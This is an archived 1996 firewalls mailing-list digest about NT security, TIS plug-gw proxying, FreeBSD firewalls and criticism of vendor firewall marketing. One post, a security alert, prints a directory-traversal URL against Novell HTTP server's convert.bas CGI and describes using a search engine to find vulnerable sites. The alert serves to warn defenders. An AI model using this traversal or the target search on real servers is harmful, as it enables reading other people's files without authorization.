(8.7.4/Miles-951221-1) with ESMTP id IAA02792 for ; Wed, 3 Jul 1996 08:09:34 -0700 (PDT) Received: from ragans-laptop (mtv-dynamic232.ins.com [199.0.193.232]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id IAA03814; Wed, 3 Jul 1996 08:06:46 -0700 (PDT) Message-Id: <2.2.32.19960703141942.009597a0@lexicon.ins.com> X-Sender: ragan@lexicon.ins.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jul 1996 09:19:42 -0500 To: dan@burkegroup.com From: Charles Ragan Subject: Re: NT Backoffice "Catapult" firewall certified? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk http://www.somarsoft.com/ At 08:40 AM 7/3/96 -0500, dan@burkegroup.com wrote: > >Ron DuFresne said: >> > >> > I have no problem with firewalls that are so easy to >administer,etc, >> > BUT, generally, the people who setup these easy-to-use >firewalls, >> > dont know/think about things like disabling guest account >> > (I know, lame example), or setting permissions on shares >(or disabling >> > all shares, or whatever), etc, and if the firewall software >dosnt >> > do this for them, then their firewall host can be easilly >compromised.... >> > >> > It takes time and knowledge (well, more like common >sense) to make an NT box >> > secure(ish). We all know that a large majority of ppl who >insist on NT >> > because of its ease of use, and requirement for little-to >no knowledge >> > of system administration and security, dont have the >time and knowledge >> > to secure their box. >[snip] > >Is there a FAQ or other resources for necessary NT security >measures in addition to the firewall? > >Dan Lenhard > > > > __________________________________________________________ Charles Ragan, Jr. International Network Services CCIE #1764, MCSE, MCNE, CBE Pager - 1-800-INS-1-INS Using NT Server 4.0 Beta2 & Eudora 2.2(32) ___________________________________________________________ From firewalls-owner Wed Jul 3 08:49:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA06390 for firewalls-outgoing; Wed, 3 Jul 1996 08:46:08 -0700 (PDT) Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA06356 for ; Wed, 3 Jul 1996 08:45:58 -0700 (PDT) Received: from gate.hussmann.com (gate.hussmann.com [205.139.241.163]) by Walden.MO.NET (8.7.4/8.6.10) with ESMTP id KAA00801 for ; Wed, 3 Jul 1996 10:38:17 -0500 (CDT) Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id JAA31941 for ; Wed, 3 Jul 1996 09:45:09 -0500 Message-Id: <199607031445.JAA31941@gate.hussmann.com> Received: from unknown(129.1.5.4) by gate.hussmann.com via smap (V1.3) Date: Wed, 3 Jul 1996 11:40:00 -0500 From: "Hicks, Rick" Subject: RE: Reading news via a firewall To: "'Firewalls List'" X-Mailer: Worldtalk (NetConnex V4.00a)/MIME Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I'm looking for a simple solution for reading news via a firewall. I've >a Linux firewall set up on our local network and lot of PCs running Win >3.x, Win95 and/or WinNT Workstations on the protected network. The >problem is that the machines on the protected network must be able to >read news via/through the firewall at the news host. Is there a >simple/good solution for a Linux firewall? A gateway or something? If so, >what news agents do support that gateway solution? > >Hope someone can help me, best regards, Gunni > An easy solution is to use the plug-gw proxy that is in the TIS firewall toolkit (ftp.tis.com). It is perfect for news, it accepts connections to port 119 (or any port you wish to assign) and forwards everything to another host and port (the desired news server). Then you just tell the clients that the firewall is the news server and they will work as if they are connected to the external news server. Rick ________________________________________________ Rick Hicks Systems Specialist Hussmann Corporation rhicks@hussmann.com http://www.hussmann.com From firewalls-owner Wed Jul 3 09:19:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA08726 for firewalls-outgoing; Wed, 3 Jul 1996 09:17:00 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA08708 for ; Wed, 3 Jul 1996 09:16:52 -0700 (PDT) From: ken@bridge.com Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id LAA11006; Wed, 3 Jul 1996 11:12:11 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA26451 Received: (from ken@localhost) by ernie.bridge.com (8.7.5/8.7.3) id LAA01425; Wed, 3 Jul 1996 11:12:20 -0500 (CDT) Date: Wed, 3 Jul 1996 11:12:20 -0500 (CDT) Message-Id: <199607031612.LAA01425@ernie.bridge.com> To: firewalls@GreatCircle.COM, RHicks@hussmann.com Subject: RE: Reading news via a firewall Cc: gunni@if.is X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: "Hicks, Rick" >An easy solution is to use the plug-gw proxy that is in the TIS firewall >toolkit (ftp.tis.com). It is perfect for news, it accepts connections to >port 119 (or any port you wish to assign) and forwards everything to >another host and port (the desired news server). Then you just tell the >clients that the firewall is the news server and they will work as if >they are connected to the external news server. The downside is that it can only be configured to connect to a single machine (which can differ based on who on the inside is connecting to it); this works well if you've a single news server that you want to connect to on the outside. But if you need to connect to a second news server, like msnews.microsoft.com (leave it to MS to screw up Usenet with their $#!@ non-propagating microsoft.* newsgroups), you'll need to set up a second plug-gw configuration listening on another port (like 120 or whatever) to connect to msnews.microsoft.com:119 (or wherever). BUT not all news readers let you specify non-standard ports, though you can make Netscape do it. I think Netscape semi-elegantly handles multiple servers, too; other (otherwise better) news readers won't always be able to handle the differences in available groups very well when you switch between servers (but that's not a firewall issue.) -KH From firewalls-owner Wed Jul 3 10:22:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA13415 for firewalls-outgoing; Wed, 3 Jul 1996 10:17:13 -0700 (PDT) Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA13406 for ; Wed, 3 Jul 1996 10:17:05 -0700 (PDT) Received: by london.micrognosis.com (4.1/NAR-Gateway) Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) Received: from moria by zeus.london.micrognosis.com (4.1/SMI-4.1) From: nreadwin@london.micrognosis.com (Neil Readwin) Received: by moria Message-Id: <9607031711.AA04712@moria> Subject: Re: Integrating Reuters Service thru TIS Toolkit To: yshaikh@nesbittburns.ca (Yasin Shaikh) Date: Wed, 3 Jul 1996 18:11:19 +0100 (BST) Cc: firewalls@greatcircle.com In-Reply-To: <31DA8975.6AC8@nesbittburns.ca> from "Yasin Shaikh" at Jul 3, 96 10:53:41 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yasin Shaikh writes: > I would like to know if some one has written a proxy using the TIS > Toolkit to allow Reuters Services for the brokerage industry( not Real > Time feed) to proxy thru the firewall If you mean RQF / RSF etc then the TIS fwtk plug-gw works well for this - we do this on our internal nets. Neil. -- "So you could say the greatest achievement of the Internet is that it turns nuclear war into nothing more than a series of routing errors." -- Mark Pesce From firewalls-owner Wed Jul 3 10:49:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA14390 for firewalls-outgoing; Wed, 3 Jul 1996 10:36:51 -0700 (PDT) Received: from argo.unm.edu (argo.unm.edu [129.24.9.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA14383 for ; Wed, 3 Jul 1996 10:36:46 -0700 (PDT) Received: by argo.unm.edu (Smail3.1.29.1 #25) Message-Id: Date: Wed, 3 Jul 96 11:33 MDT From: flounder@unm.edu (--Flounder--) To: cyberia@CAM.ORG, forcible_entry@msn.com Subject: RE: Training??? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Learning Tree was mentioned as a possible place for training. I found their web site: http://www.learningtree.com Gives details on everything from classes offered to when they take place and tuition rates. Scott From firewalls-owner Wed Jul 3 11:04:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA14480 for firewalls-outgoing; Wed, 3 Jul 1996 10:38:43 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA14461 for ; Wed, 3 Jul 1996 10:38:34 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id TAA11191; Wed, 3 Jul 1996 19:26:20 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31DAAD64.1702@apogee-com.fr> Date: Wed, 03 Jul 1996 19:27:00 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Yasin Shaikh Cc: Firewalls@greatcircle.com Subject: Re: Integrating Reuters Service thru TIS Toolkit References: <31DA8975.6AC8@nesbittburns.ca> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, There is a generic proxy in the TIS toolkit named 'plug-gw'. This proxy is designed to accept a connection on a well-known port number and relay all the traffic to the real destination. The usual example is to use plug-gw as a relay for the News (port 119) between an internal server and the external server. The plug-gw can be configured in a many-to-one manner: plug-gw: port nntp 1.2.3.* -plug-to server -port 119 and the Gauntlet version can support many-to-many connections such as: plug-gw: port nntp 1.2.3.* -port nntp where you don't specify the real destination to plug to. But I don't know if the Toolkit can do it. If your application use a single TCP connection on a defined port number then you can use the plug-gw. I've used it for such an application at a customer site. Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Wed Jul 3 11:34:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA18869 for firewalls-outgoing; Wed, 3 Jul 1996 11:29:14 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA18850 for ; Wed, 3 Jul 1996 11:29:07 -0700 (PDT) Received: by hidata.com; id AA20822; Wed, 3 Jul 96 11:26:28 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Wed, 3 Jul 1996 11:26:10 -0700 Message-Id: <199607031826.LAA00463@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Re: /etc/shadow encryption Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:55 AM 7/3/96 EST, you wrote: >Michael Ryan writes: >> Forgive me if I'm wrong, but I believe the crypt() function is not >> exported outside the U.S. and I note the requestor is >> outside the U.S., so his Un*x probably doesn't have it. > >In this case you are wrong, but are forgiven. The crypt program and other >reversible encryption tools for Unix can't be exported, but the crypt routine >(i.e. crypt(3)) is exportable, because it is a one-way "encryption" (i.e. >you can't get the original info back). > > Frank Crawford AHA! That sheds some light on the one-way-function passwords in NT... :) (Just convert the password into some binary and pass that binary string around for authentication, no one will be the wiser...) Bill Stout From firewalls-owner Wed Jul 3 12:34:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA23153 for firewalls-outgoing; Wed, 3 Jul 1996 12:19:16 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.41]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA23146 for ; Wed, 3 Jul 1996 12:19:10 -0700 (PDT) Received: from orion.webspan.net (scanner@orion.webspan.net [206.154.70.41]) by orion.webspan.net (8.7.5/8.6.12) with SMTP id PAA12594; Wed, 3 Jul 1996 15:15:50 -0400 (EDT) Date: Wed, 3 Jul 1996 15:15:49 -0400 (EDT) From: Scanner To: Uldis Bojars cc: firewalls@GreatCircle.COM Subject: Re: OS/2 firewalls? In-Reply-To: <31DA8200@lda.gov.lv> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 3 Jul 1996, Uldis Bojars wrote: > Hi! > > I am searching for OS/2 firewalls - are there any? It's > very hard to find, but I think there are some. Of course > I do not want OS/2 because I want to use firewall as a > workstation ;-) Dont know any for OS/2. > And - if negative - what are good firewalls for freeBSD? > Our company is not so big to buy Sun or HP UNiX computer > and use it as a firewall. There is native ipfw a packet filter built into FreeBSD there is also supposedly i think ipfilter for FreeBSD either in the works or out there somewhere. -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net http://www.freebsd.org | SysAdmin / Network Engineer / Security ===================================| Member BSDNET team! http://www.bsdnet.org From firewalls-owner Wed Jul 3 13:50:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA27484 for firewalls-outgoing; Wed, 3 Jul 1996 13:34:17 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA27477 for ; Wed, 3 Jul 1996 13:34:11 -0700 (PDT) Received: by hidata.com; id AA21883; Wed, 3 Jul 96 13:31:32 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Wed, 3 Jul 1996 13:31:17 -0700 Message-Id: <199607032031.NAA01036@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Computer risk lists Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What risk lists are recommended by the collective? This is one cool list: http://catless.ncl.ac.uk/Risks BTW - I thought HERF guns were fantasy! Network world - 7/1/96 p.8 'CIA cyber-war center' Bill Stout <=======10========20========30========40========50========60========70========80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body, spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'." 408-970-4822 | Infowar, Cyber-war, yes, 'they' are out to get you... -------------------------------------------------------------------------------- From firewalls-owner Wed Jul 3 14:19:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA29386 for firewalls-outgoing; Wed, 3 Jul 1996 14:03:07 -0700 (PDT) Received: from piscopo.ncgroup.com (piscopo.ncgroup.com [192.232.23.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA29368 for ; Wed, 3 Jul 1996 14:02:56 -0700 (PDT) Received: from MIAGI.ncgroup.com ([192.232.23.8]) by piscopo.ncgroup.com Received: by MIAGI.ncgroup.com with Microsoft Exchange (IMC 4.0.838.14) Message-ID: From: AKRUMSEE@ncgroup.com (Art Krumsee) To: "'Firewalls@GreatCircle.COM'" Subject: RE: Catapault firewall Date: Wed, 3 Jul 1996 16:53:39 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.838.14 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk While you are checking out web pages I'd suggest that you take a look at a new "firewall" from MCI and Intel. Called Webmaker, this is claimed to be a firewall/web server/router all in one Pentium system. The claim is that You will enjoy the following quotes from the web page. Art "Up and running in an hour with a total solution The networkMCI WebMaker is truly the best route to doing business on the Internet. It comes with all the hardware and software necessary for a secure Internet presence. It's installed with leased line Internet service from MCI. It's a total solution that's all preconfigured and ready to go. Built-in software wizards and pre-designed templates let you develop a "look" that suits your business and customize your site with information specific to your company. In short, it's so well thought out that most networkMCI WebMaker sites are on line, accessible to anyone with web access anywhere in the world, in about an hour." "No UNIX experts required Today's Pentium Pro processor-based servers give you a familiar Windows-based platform for your Internet server. So why add another technology to your worries? The networkMCI WebMaker can be used and maintained easily by anyone familiar with PCs and Windows NT operating system. Chances are, you have more than one such person on staff. Using somebody already on staff is much less expensive than having to hire another employee or constantly bringing in an outside consultant every time something needs to be fixed or changed. " "Safe and secure The networkMCI WebMaker features an integrated router and Proxy Server forming a security firewall. The built-in packet-filtering router and Web Proxy Server provide secure Internet access and a secure presence for your business. Having these components intergrated into a turnkey solution saves you from having to buy additonal external routers and proxy servers costing thousands of dollars. It also eliminates the need for expensive technical specialists to install them. The end result? By design, only allowed services such as HTTP and e-mail are enabled, maximizing safety, enforcing a conservative security policy, and giving you the current standard in Internet security for a fraction of the usual price. " "The bottom line The networkMCI WebMaker solution is unique. It integrates the proven components with secure Internet connectivity, comprehensive administration and ease of use. You get: Pentium Pro processor-based system, loaded and pre-configured with all necessary communication hardware and Internet services software Integrated security firewall with a packet-filtering router and Proxy Server Capacity for scalable leased line Internet connectivity from 56 Kbps to full T-1 speed Secure Web presence (Web and e-mail) and real-time Internet access for TCP/IP LAN users (Web, e-mail, FTP) Easy-to-use tools for installation, Web site creation and site promotion Intuitive WebMaker Management Console running over Windows NT operating system Web Back-end Online Service for integrated product support" ---------- From: Marcus J. Ranum[SMTP:mjr@clark.net] Sent: Monday, July 01, 1996 9:39 PM To: Firewalls@GreatCircle.COM Subject: Re: Catapault firewall I pulled down Microsoft's page on Catapult. I urge you all to do so and give it a read. From where I sit, it looks like the firewall market has reached its next level, with this announcement. The brief on Microsoft's page is completely content-free. Several times, Catapult is recommended as the solution because it's secure. Nothing about why it's secure or how it's secure. Don't bother your head with that stuff! It's SECURE, OK? ...Or at least as secure as a beta product that only runs on a beta version of NT can be. In fairness to Microsoft, it may be pretty good stuff. But we can't tell from what they say. Which is why I feel it marks a milestone in the firewall market. The Big Boys Are Here now and it's SECURE, it's OK. That argument worked for Netscape, for a while. Those of us who've been with this firewall thing for a while have seen the market get muddied before, and eventually things calm down again. It'll be fascinating to see what happens if Microsoft decides to put even a teeny bit of their marketing muscle behind Catapult. I guess it means that, as a technology, firewalls have "arrived." mjr. From firewalls-owner Wed Jul 3 14:54:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA02505 for firewalls-outgoing; Wed, 3 Jul 1996 14:46:34 -0700 (PDT) Received: from sam.networx.ie (dublin-ts17-132.indigo.ie [194.125.134.132]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA02487 for ; Wed, 3 Jul 1996 14:46:26 -0700 (PDT) Received: from mip1.networx.ie (mip1.networx.ie [194.9.12.1]) by sam.networx.ie (8.6.12/8.6.12) with SMTP id WAA13890 for ; Wed, 3 Jul 1996 22:38:34 GMT X-Organisation: I.T. NetworX Ltd X-Business: Network Consultancy and Training X-Address: 67 Merrion Square, Dublin 2, Ireland X-Voice: +353-1-676-8866 X-Fax: +353-1-676-8868 Received: from mike.networx.ie by mip1.networx.ie Date: Wed, 3 Jul 1996 22:36:58 BST From: Michael Ryan Reply-To: mike@networx.ie Subject: tcpshow man page To: Firewalls Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The manpage for tcpshow is now at http://www.cs.berkeley.edu/~daw/mike Regards, Mike --- From firewalls-owner Wed Jul 3 15:04:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA03442 for firewalls-outgoing; Wed, 3 Jul 1996 14:58:35 -0700 (PDT) Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA03419 for ; Wed, 3 Jul 1996 14:58:19 -0700 (PDT) Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.7.5/8.7.3) id HAA16403; Thu, 4 Jul 1996 07:47:50 +1000 (EST) Received: from guru.citec.qld.gov.au(147.132.20.47) by citecuh.citec.qld.gov.au via smap (V1.3) Received: (from sgcccdc@localhost) by guru.citec.qld.gov.au (8.6.12/8.6.12) id HAA05897; Thu, 4 Jul 1996 07:55:54 +1000 From: Colin Campbell Message-Id: <199607032155.HAA05897@guru.citec.qld.gov.au> Subject: Re: NEC SocksPlus?? To: Russ.Cooper@RC.Toronto.on.ca (Russ) Date: Thu, 4 Jul 1996 07:55:52 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <01BB68AF.B7985580@rwcooper.rc.toronto.on.ca> from "Russ" at Jul 3, 96 07:17:37 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My mailer thinks Russ said: > [lots of stuff about SOCKS(Plus)] > The thing that stopped me using socks and going for fwtk was the requirement to find/manufacture socks-compatible clients. In my admittedly limitd knowledge of that side of the market, only Netscape is SOCKS-aware. What do you do when you have to support users on systems from 100 different vendors running 30 different operating systems and Win 3.X (not considered an OS :-) all with their favourite tools for ftp/telnet/.... Colin From firewalls-owner Wed Jul 3 15:23:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA02972 for firewalls-outgoing; Wed, 3 Jul 1996 14:53:04 -0700 (PDT) Received: from carmen.broder.com (carmen.broder.com [207.77.64.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA02949 for ; Wed, 3 Jul 1996 14:52:53 -0700 (PDT) Received: (from uucp@localhost) by carmen.broder.com (8.6.13/8.6.12) id OAA23610 for ; Wed, 3 Jul 1996 14:50:12 -0700 Received: from moonix.broder.com(204.189.16.4) by carmen.broder.com via smap (V1.3) Received: (from ttt@localhost) by moonix.broder.com (8.6.12/8.6.12) id OAA00428; Wed, 3 Jul 1996 14:50:07 -0700 Date: Wed, 3 Jul 1996 14:50:06 -0700 (PDT) From: TTT Group To: firewalls@greatcircle.com Subject: *** SECURITY ALERT *** Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I spent some time exploring Novell's HTTP server and out of the box there is a CGI that is VERY VERY INSECURE!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! If you are running the Novell HTTP server, please disable the CGI's it comes with it until you understand (fully understand) what the security risks are. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! The CGI in question is convert.bas (yes, cgi's in basic, stop laughing). (There may be more CGI's in the scripts dir that can be exploited but this was all I could stomoch.) A remote user can read any file on the remote file system using this CGI. This means that if you are running the Novell HTTP server and have the 'out of box' CGI's, you are breached. Exploit code: http://victim.com/scripts/convert.bas?../../anything/you/want/to/view I was going to see how bad this threat was by connecting to www servers, testing for "Novell HTTP" in the HTTP server responce BUT WHY DO THAT WHEN YOU HAVE www.altavista.digital.com :-) +links:scripts/convert.bas will return you all the sites that can be breached. PLEASE PLEASE PLEASE don't open the box and put machine on the Internet. I am getting tired of this kind of stuff. Who the hell did Novell consult with to write these darn CGI's? It makes me sad. --blast From firewalls-owner Wed Jul 3 15:34:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA04707 for firewalls-outgoing; Wed, 3 Jul 1996 15:18:26 -0700 (PDT) Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA04678 for ; Wed, 3 Jul 1996 15:18:16 -0700 (PDT) Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.7.5/8.7.3) id IAA17683; Thu, 4 Jul 1996 08:07:47 +1000 (EST) Received: from guru.citec.qld.gov.au(147.132.20.47) by citecuh.citec.qld.gov.au via smap (V1.3) Received: (from sgcccdc@localhost) by guru.citec.qld.gov.au (8.6.12/8.6.12) id IAA05993; Thu, 4 Jul 1996 08:15:43 +1000 From: Colin Campbell Message-Id: <199607032215.IAA05993@guru.citec.qld.gov.au> Subject: Re: Integrating Reuters Service thru TIS Toolkit To: zwobada@apogee-com.fr (Jean-Francois Zwobada) Date: Thu, 4 Jul 1996 08:15:43 +1000 (EST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <31DAAD64.1702@apogee-com.fr> from "Jean-Francois Zwobada" at Jul 3, 96 07:27:00 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My mailer thinks Jean-Francois Zwobada said: > [lots of stuff] > > and the Gauntlet version can support many-to-many connections such > as: > plug-gw: port nntp 1.2.3.* -port nntp > where you don't specify the real destination to plug to. But I don't > know if the Toolkit can do it. > I believe they can only do this by supporting transparent proxies and that requires kernel hacks which is why Gauntlet (on BSDI only?) supports it and the toolkit doesn't. It is in essence nothing more than a router filter, restricting access to certain addresses (1.2.3.*). Colin From firewalls-owner Wed Jul 3 15:49:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05601 for firewalls-outgoing; Wed, 3 Jul 1996 15:29:11 -0700 (PDT) Received: from pdh.com (pdh.com [192.159.13.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA05558 for ; Wed, 3 Jul 1996 15:28:59 -0700 (PDT) Received: from telluride.pdh.com by pdh.com (NeXT-1.0 (From Sendmail 5.52)/NeXT-2.0) Message-Id: <9607032224.AA09477@pdh.com> Received: by telluride.pdh.com (NX5.67f2/NX3.0X) Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 3.3 v118.2) Received: by NeXT.Mailer (1.118.2) From: Jason Rhoads Date: Wed, 3 Jul 96 15:25:36 -0700 To: firewalls@greatcircle.com Subject: Re:OS/2 firewalls? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry I don't know of any OS/2 firewalls, but I do have some experience with FreeBSD. The TIS Firewall Toolkit and Darren Reed's IP Filter package both work great under FreeBSD. However, you will need some UNIX expertise in order to get things up and running. They are not plug and play solutions. TIS Toolkit (ftp://ftp.tis.com/pub/firewalls/toolkit) IP Filter (http://www.cyber.com.au/users/darrenr) FreeBSD (http://www.freebsd.org) - Jason Begin forwarded message: X-Authentication-Warning: lapsene.mii.lu.lv: uulda set sender to lda!lda.gov.lv!uldis@lda.gov.lv using -f >Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); To: firewalls@greatcircle.com From: Uldis Bojars Subject: OS/2 firewalls? Date: Wed, 3 Jul 1996 10:21:52 +0200 Lines: 17 Sender: firewalls-owner@greatcircle.com Hi! I am searching for OS/2 firewalls - are there any? It's very hard to find, but I think there are some. Of course I do not want OS/2 because I want to use firewall as a workstation ;-) And - if negative - what are good firewalls for freeBSD? Our company is not so big to buy Sun or HP UNiX computer and use it as a firewall. Uldis > If you learn from mistakes, you will learn a lot today. --- GoldED/386 3.00.Alpha1+ From firewalls-owner Wed Jul 3 17:19:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA14429 for firewalls-outgoing; Wed, 3 Jul 1996 17:13:32 -0700 (PDT) Received: from ns.isk.co.kr ([203.240.169.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA14417 for ; Wed, 3 Jul 1996 17:13:23 -0700 (PDT) Received: from isk82.isk.co.kr (isk82.isk.co.kr [203.240.169.82]) by ns.isk.co.kr (8.6.12H1/8.6.12) with SMTP id JAA02310 for ; Thu, 4 Jul 1996 09:10:37 +0900 Message-ID: <31DB0BEF.7D57@isk.co.kr> Date: Thu, 04 Jul 1996 09:10:23 +0900 From: "Kwanho Shin(=?EUC-KR?B?vcWw/Mij?=)" Organization: Internet Security Korea X-Mailer: Mozilla 3.0b4 (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: IP translation Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk when i set the Firewall-1(Checkpoint), i met some problem. First is how I can setup for IP translation(inbound & outbound) I set route, arp for illegal IP & grobal IP. But i can translate IP address(Illegal --> Grobal, Grobal --> Illegal) -- Kwanho Shin (HL1MLV) Mailto: skh@isk.co.kr Internet Security Korea Co., Ltd. Tel:(02)786-3555 Fax:(02)786-3554 From firewalls-owner Wed Jul 3 17:34:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA14430 for firewalls-outgoing; Wed, 3 Jul 1996 17:13:33 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA14414 for ; Wed, 3 Jul 